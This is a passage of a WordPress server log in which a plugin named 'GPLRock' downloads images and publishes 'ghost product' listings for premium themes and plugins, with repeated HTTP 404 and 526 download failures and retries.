envira-gallery-wordpress-plugin [09-Mar-2026 18:02:32 UTC] GPLRock: Image downloaded successfully for product zox-news-professional-wordpress-news-magazine-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-475d5cc6.jpg [09-Mar-2026 18:02:32 UTC] GPLRock: Using pre-downloaded image for product zox-news-professional-wordpress-news-magazine-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-475d5cc6.jpg [09-Mar-2026 18:02:32 UTC] GPLRock: Ghost product published with image - Product ID: zox-news-professional-wordpress-news-magazine-theme [09-Mar-2026 18:02:32 UTC] GPLRock: Image downloaded successfully for product alhambra-islamic-centre-wordpress-theme-rtl (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c00b5d90.png [09-Mar-2026 18:02:32 UTC] GPLRock: Using pre-downloaded image for product alhambra-islamic-centre-wordpress-theme-rtl: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c00b5d90.png [09-Mar-2026 18:02:32 UTC] GPLRock: Ghost product published with image - Product ID: alhambra-islamic-centre-wordpress-theme-rtl [09-Mar-2026 18:02:32 UTC] GPLRock: Image downloaded successfully for product jw-player-compatibility-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-61db122f.png [09-Mar-2026 18:02:32 UTC] GPLRock: Using pre-downloaded image for product jw-player-compatibility-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-61db122f.png [09-Mar-2026 18:02:32 UTC] GPLRock: Ghost product published with image - Product ID: jw-player-compatibility-for-amp [09-Mar-2026 18:02:32 UTC] GPLRock: Image downloaded successfully for product learndash-lms-toolkit-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-25136eb6.jpg [09-Mar-2026 18:02:32 UTC] GPLRock: Using pre-downloaded image for product learndash-lms-toolkit-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-25136eb6.jpg [09-Mar-2026 18:02:32 UTC] GPLRock: Ghost product published with image - Product ID: learndash-lms-toolkit-addon [09-Mar-2026 18:02:33 UTC] GPLRock: Image downloaded successfully for product woocommerce-pincode-zipcode-checker (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4cc4ae6c.png [09-Mar-2026 18:02:33 UTC] GPLRock: Using pre-downloaded image for product woocommerce-pincode-zipcode-checker: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4cc4ae6c.png [09-Mar-2026 18:02:33 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-pincode-zipcode-checker [09-Mar-2026 18:02:33 UTC] GPLRock: Image downloaded successfully for product de-jure-attorney-and-lawyer-wp-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b28e9379.jpg [09-Mar-2026 18:02:33 UTC] GPLRock: Using pre-downloaded image for product de-jure-attorney-and-lawyer-wp-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b28e9379.jpg [09-Mar-2026 18:02:33 UTC] GPLRock: Ghost product published with image - Product ID: de-jure-attorney-and-lawyer-wp-theme [09-Mar-2026 18:02:33 UTC] GPLRock: Image downloaded successfully for product the-event-calender-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-88be0d20.png [09-Mar-2026 18:02:33 UTC] GPLRock: Using pre-downloaded image for product the-event-calender-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-88be0d20.png [09-Mar-2026 18:02:33 UTC] GPLRock: Ghost product published with image - Product ID: the-event-calender-for-amp [09-Mar-2026 18:02:34 UTC] GPLRock: Image downloaded successfully for product woocommerce-mailchimp-discount (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c2105719.jpg [09-Mar-2026 18:02:34 UTC] GPLRock: Using pre-downloaded image for product woocommerce-mailchimp-discount: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c2105719.jpg [09-Mar-2026 18:02:34 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-mailchimp-discount [09-Mar-2026 18:02:34 UTC] GPLRock: Image downloaded successfully for product wp-fluent-forms-pro-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5dbb6a26.svg [09-Mar-2026 18:02:34 UTC] GPLRock: Using pre-downloaded image for product wp-fluent-forms-pro-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5dbb6a26.svg [09-Mar-2026 18:02:34 UTC] GPLRock: Ghost product published with image - Product ID: wp-fluent-forms-pro-add-on [09-Mar-2026 18:02:35 UTC] GPLRock: Image downloaded successfully for product arangi-organic-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7808ce04.jpg [09-Mar-2026 18:02:35 UTC] GPLRock: Using pre-downloaded image for product arangi-organic-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7808ce04.jpg [09-Mar-2026 18:02:35 UTC] GPLRock: Ghost product published with image - Product ID: arangi-organic-woocommerce-theme [09-Mar-2026 18:02:35 UTC] GPLRock: Image downloaded successfully for product ccpa-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e91a80a.png [09-Mar-2026 18:02:35 UTC] GPLRock: Using pre-downloaded image for product ccpa-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e91a80a.png [09-Mar-2026 18:02:35 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-beehive-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-65dfa59f.jpg [09-Mar-2026 18:02:35 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-beehive-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-65dfa59f.jpg [09-Mar-2026 18:02:35 UTC] GPLRock: Ghost product published with image - Product ID: ccpa-for-amp [09-Mar-2026 18:02:35 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-beehive-pro [09-Mar-2026 18:02:35 UTC] GPLRock: Image downloaded successfully for product yoast-woocommerce-seo-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ce83f821.jpg [09-Mar-2026 18:02:35 UTC] GPLRock: Using pre-downloaded image for product yoast-woocommerce-seo-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ce83f821.jpg [09-Mar-2026 18:02:36 UTC] GPLRock: Ghost product published with image - Product ID: yoast-woocommerce-seo-premium [09-Mar-2026 18:02:36 UTC] GPLRock: Image downloaded successfully for product accalia-dermatology-clinic-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6158f38.avif [09-Mar-2026 18:02:36 UTC] GPLRock: Using pre-downloaded image for product accalia-dermatology-clinic-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6158f38.avif [09-Mar-2026 18:02:36 UTC] GPLRock: Ghost product published with image - Product ID: accalia-dermatology-clinic-wordpress-theme [09-Mar-2026 18:02:36 UTC] GPLRock: Image downloaded successfully for product email-opt-in-forms-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73d11985.png [09-Mar-2026 18:02:36 UTC] GPLRock: Using pre-downloaded image for product email-opt-in-forms-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73d11985.png [09-Mar-2026 18:02:36 UTC] GPLRock: Ghost product published with image - Product ID: email-opt-in-forms-for-amp [09-Mar-2026 18:02:36 UTC] GPLRock: Image downloaded successfully for product apex-notification-bar-responsive-notification-bar-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-265ab412.jpg [09-Mar-2026 18:02:37 UTC] GPLRock: Using pre-downloaded image for product apex-notification-bar-responsive-notification-bar-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-265ab412.jpg [09-Mar-2026 18:02:37 UTC] GPLRock: Ghost product published with image - Product ID: apex-notification-bar-responsive-notification-bar-plugin-for-wordpress [09-Mar-2026 18:02:37 UTC] GPLRock: Image downloaded successfully for product seofy-seo-digital-marketing-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-134096d5.jpg [09-Mar-2026 18:02:37 UTC] GPLRock: Using pre-downloaded image for product seofy-seo-digital-marketing-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-134096d5.jpg [09-Mar-2026 18:02:37 UTC] GPLRock: Ghost product published with image - Product ID: seofy-seo-digital-marketing-agency-wordpress-theme [09-Mar-2026 18:02:37 UTC] GPLRock: Image downloaded successfully for product organica-responsive-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dba4ae52.jpg [09-Mar-2026 18:02:37 UTC] GPLRock: Using pre-downloaded image for product organica-responsive-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dba4ae52.jpg [09-Mar-2026 18:02:37 UTC] GPLRock: Ghost product published with image - Product ID: organica-responsive-woocommerce-wordpress-theme [09-Mar-2026 18:02:38 UTC] GPLRock: Image downloaded successfully for product pinterest-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf09a313.jpg [09-Mar-2026 18:02:38 UTC] GPLRock: Using pre-downloaded image for product pinterest-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf09a313.jpg [09-Mar-2026 18:02:38 UTC] GPLRock: Ghost product published with image - Product ID: pinterest-for-woocommerce [09-Mar-2026 18:02:38 UTC] GPLRock: Image downloaded successfully for product drone-media-aerial-photography-videography-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-046ced65.jpg [09-Mar-2026 18:02:38 UTC] GPLRock: Using pre-downloaded image for product drone-media-aerial-photography-videography-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-046ced65.jpg [09-Mar-2026 18:02:38 UTC] GPLRock: Image downloaded successfully for product im-event-event-conference-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d1aebff3.jpg [09-Mar-2026 18:02:38 UTC] GPLRock: Using pre-downloaded image for product im-event-event-conference-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d1aebff3.jpg [09-Mar-2026 18:02:39 UTC] GPLRock: Image downloaded successfully for product car-repair-services-auto-mechanic-wordpress-theme-rtl (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-091ec4f3.png [09-Mar-2026 18:02:39 UTC] GPLRock: Using pre-downloaded image for product car-repair-services-auto-mechanic-wordpress-theme-rtl: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-091ec4f3.png [09-Mar-2026 18:02:39 UTC] GPLRock: Ghost product published with image - Product ID: drone-media-aerial-photography-videography-wordpress-theme [09-Mar-2026 18:02:39 UTC] GPLRock: Ghost product published with image - Product ID: car-repair-services-auto-mechanic-wordpress-theme-rtl [09-Mar-2026 18:02:39 UTC] GPLRock: Ghost product published with image - Product ID: im-event-event-conference-wordpress-theme [09-Mar-2026 18:02:40 UTC] GPLRock: Image downloaded successfully for product gravity-forms-authorize-net-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6a3f01b4.jpg [09-Mar-2026 18:02:41 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-authorize-net-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6a3f01b4.jpg [09-Mar-2026 18:02:41 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-authorize-net-addon [09-Mar-2026 18:02:41 UTC] GPLRock: Image downloaded successfully for product blocksy-companion-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df5ffae0.jpg [09-Mar-2026 18:02:41 UTC] GPLRock: Image downloaded successfully for product charityheart-charity-responsive-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ebab8331.jpg [09-Mar-2026 18:02:41 UTC] GPLRock: Using pre-downloaded image for product blocksy-companion-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df5ffae0.jpg [09-Mar-2026 18:02:41 UTC] GPLRock: Using pre-downloaded image for product charityheart-charity-responsive-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ebab8331.jpg [09-Mar-2026 18:02:41 UTC] GPLRock: Ghost product published with image - Product ID: blocksy-companion-premium [09-Mar-2026 18:02:41 UTC] GPLRock: Ghost product published with image - Product ID: charityheart-charity-responsive-wordpress-theme [09-Mar-2026 18:02:42 UTC] GPLRock: Image download failed for product happystore-responsive-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [09-Mar-2026 18:02:42 UTC] GPLRock: Image downloaded successfully for product seocify-seo-and-digital-marketing-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-865611ab.jpg [09-Mar-2026 18:02:42 UTC] GPLRock: Using pre-downloaded image for product seocify-seo-and-digital-marketing-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-865611ab.jpg [09-Mar-2026 18:02:42 UTC] GPLRock: Ghost product published with image - Product ID: seocify-seo-and-digital-marketing-agency-wordpress-theme [09-Mar-2026 18:02:43 UTC] GPLRock: Image downloaded successfully for product seoes-marketing-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6291f3fa.png [09-Mar-2026 18:02:43 UTC] GPLRock: Using pre-downloaded image for product seoes-marketing-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6291f3fa.png [09-Mar-2026 18:02:43 UTC] GPLRock: Ghost product published with image - Product ID: seoes-marketing-agency-wordpress-theme [09-Mar-2026 18:02:45 UTC] GPLRock: Image download failed for product happystore-responsive-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [09-Mar-2026 18:02:49 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2022/04/HappyStore-Responsive-WordPress-WooCommerce-Theme.jpg for product happystore-responsive-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 404, Error: [09-Mar-2026 18:02:50 UTC] GPLRock: Image download failed for product happystore-responsive-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [09-Mar-2026 18:02:54 UTC] GPLRock: Image download failed for product happystore-responsive-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [09-Mar-2026 18:02:58 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2022/04/HappyStore-Responsive-WordPress-WooCommerce-Theme.jpg for product happystore-responsive-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 404, Error: [09-Mar-2026 18:02:58 UTC] GPLRock WARNING: Image download failed for product happystore-responsive-wordpress-woocommerce-theme. URL: https://www.gplrock.com/wp-content/uploads/2022/04/HappyStore-Responsive-WordPress-WooCommerce-Theme.jpg [09-Mar-2026 18:02:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: happystore-responsive-wordpress-woocommerce-theme [09-Mar-2026 18:02:59 UTC] GPLRock: Image downloaded successfully for product animated-image-banners-for-wpbakery-page-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b190dab0.png [09-Mar-2026 18:03:00 UTC] GPLRock: Using pre-downloaded image for product animated-image-banners-for-wpbakery-page-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b190dab0.png [09-Mar-2026 18:03:00 UTC] GPLRock: Ghost product published with image - Product ID: animated-image-banners-for-wpbakery-page-builder [09-Mar-2026 23:32:18 UTC] GPLRock: Image download failed for product california-resort-hotel-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:20 UTC] GPLRock: Image download failed for product california-resort-hotel-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/california---resort--hotel-wordpress-theme-18172.webp for product california-resort-hotel-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:32:22 UTC] GPLRock: Image download failed for product california-resort-hotel-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:24 UTC] GPLRock: Image download failed for product california-resort-hotel-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/california---resort--hotel-wordpress-theme-18172.webp for product california-resort-hotel-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:32:26 UTC] GPLRock WARNING: Image download failed for product california-resort-hotel-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/california---resort--hotel-wordpress-theme-18172.webp [09-Mar-2026 23:32:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: california-resort-hotel-wordpress-theme [09-Mar-2026 23:32:26 UTC] GPLRock: Image download failed for product kudo-portfolio-marketing-landing-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:29 UTC] GPLRock: Image download failed for product kudo-portfolio-marketing-landing-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kudo---portfolio-marketing-landing-page-wordpress-theme-27246.webp for product kudo-portfolio-marketing-landing-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:32:31 UTC] GPLRock: Image download failed for product kudo-portfolio-marketing-landing-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:33 UTC] GPLRock: Image download failed for product kudo-portfolio-marketing-landing-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kudo---portfolio-marketing-landing-page-wordpress-theme-27246.webp for product kudo-portfolio-marketing-landing-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:32:35 UTC] GPLRock WARNING: Image download failed for product kudo-portfolio-marketing-landing-page-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kudo---portfolio-marketing-landing-page-wordpress-theme-27246.webp [09-Mar-2026 23:32:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kudo-portfolio-marketing-landing-page-wordpress-theme [09-Mar-2026 23:32:35 UTC] GPLRock: Image download failed for product cooks-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:37 UTC] GPLRock: Image download failed for product cooks-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cooks---restaurant-wordpress-theme-5432.webp for product cooks-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:32:40 UTC] GPLRock: Image download failed for product cooks-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:42 UTC] GPLRock: Image download failed for product cooks-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cooks---restaurant-wordpress-theme-5432.webp for product cooks-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:32:44 UTC] GPLRock WARNING: Image download failed for product cooks-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cooks---restaurant-wordpress-theme-5432.webp [09-Mar-2026 23:32:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cooks-restaurant-wordpress-theme [09-Mar-2026 23:32:44 UTC] GPLRock: Image download failed for product alamak-responsive-one-page-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:46 UTC] GPLRock: Image download failed for product alamak-responsive-one-page-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alamak---responsive-one-page-portfolio-theme-31089.webp for product alamak-responsive-one-page-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:32:48 UTC] GPLRock: Image download failed for product alamak-responsive-one-page-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:50 UTC] GPLRock: Image download failed for product alamak-responsive-one-page-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alamak---responsive-one-page-portfolio-theme-31089.webp for product alamak-responsive-one-page-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:32:52 UTC] GPLRock WARNING: Image download failed for product alamak-responsive-one-page-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/alamak---responsive-one-page-portfolio-theme-31089.webp [09-Mar-2026 23:32:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: alamak-responsive-one-page-portfolio-theme [09-Mar-2026 23:32:53 UTC] GPLRock: Image download failed for product komo-bike-rental-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:55 UTC] GPLRock: Image download failed for product komo-bike-rental-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/komo---bike-rental-shop-wordpress-theme-5808.webp for product komo-bike-rental-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:32:57 UTC] GPLRock: Image download failed for product komo-bike-rental-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:32:59 UTC] GPLRock: Image download failed for product komo-bike-rental-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/komo---bike-rental-shop-wordpress-theme-5808.webp for product komo-bike-rental-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:33:01 UTC] GPLRock WARNING: Image download failed for product komo-bike-rental-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/komo---bike-rental-shop-wordpress-theme-5808.webp [09-Mar-2026 23:33:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: komo-bike-rental-shop-wordpress-theme [09-Mar-2026 23:33:02 UTC] GPLRock: Image download failed for product spaclub-beauty-salon-spa-service-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:04 UTC] GPLRock: Image download failed for product spaclub-beauty-salon-spa-service-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spaclub---beauty-salon--spa-service-booking-wordpress-theme-13435.webp for product spaclub-beauty-salon-spa-service-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:33:06 UTC] GPLRock: Image download failed for product spaclub-beauty-salon-spa-service-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:08 UTC] GPLRock: Image download failed for product spaclub-beauty-salon-spa-service-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spaclub---beauty-salon--spa-service-booking-wordpress-theme-13435.webp for product spaclub-beauty-salon-spa-service-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:33:11 UTC] GPLRock WARNING: Image download failed for product spaclub-beauty-salon-spa-service-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/spaclub---beauty-salon--spa-service-booking-wordpress-theme-13435.webp [09-Mar-2026 23:33:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: spaclub-beauty-salon-spa-service-booking-wordpress-theme [09-Mar-2026 23:33:11 UTC] GPLRock: Image download failed for product malm-a-charming-multi-concept-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:13 UTC] GPLRock: Image download failed for product malm-a-charming-multi-concept-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/malm---a-charming-multi-concept-wordpress-theme-26888.webp for product malm-a-charming-multi-concept-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:33:15 UTC] GPLRock: Image download failed for product malm-a-charming-multi-concept-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:18 UTC] GPLRock: Image download failed for product malm-a-charming-multi-concept-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/malm---a-charming-multi-concept-wordpress-theme-26888.webp for product malm-a-charming-multi-concept-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:33:20 UTC] GPLRock WARNING: Image download failed for product malm-a-charming-multi-concept-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/malm---a-charming-multi-concept-wordpress-theme-26888.webp [09-Mar-2026 23:33:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: malm-a-charming-multi-concept-wordpress-theme [09-Mar-2026 23:33:20 UTC] GPLRock: Image download failed for product chemistry-responsive-portfolio-shop-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:22 UTC] GPLRock: Image download failed for product chemistry-responsive-portfolio-shop-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chemistry---responsive-portfolio--shop-wp-theme-23745.webp for product chemistry-responsive-portfolio-shop-wp-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:33:24 UTC] GPLRock: Image download failed for product chemistry-responsive-portfolio-shop-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:26 UTC] GPLRock: Image download failed for product chemistry-responsive-portfolio-shop-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chemistry---responsive-portfolio--shop-wp-theme-23745.webp for product chemistry-responsive-portfolio-shop-wp-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:33:28 UTC] GPLRock WARNING: Image download failed for product chemistry-responsive-portfolio-shop-wp-theme. URL: https://meldwp.com/wp-content/uploads/chemistry---responsive-portfolio--shop-wp-theme-23745.webp [09-Mar-2026 23:33:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: chemistry-responsive-portfolio-shop-wp-theme [09-Mar-2026 23:33:28 UTC] GPLRock: Image download failed for product meatlers-butcher-meat-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:31 UTC] GPLRock: Image download failed for product meatlers-butcher-meat-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/meatlers---butcher-meat-shop-wordpress-theme-13019.webp for product 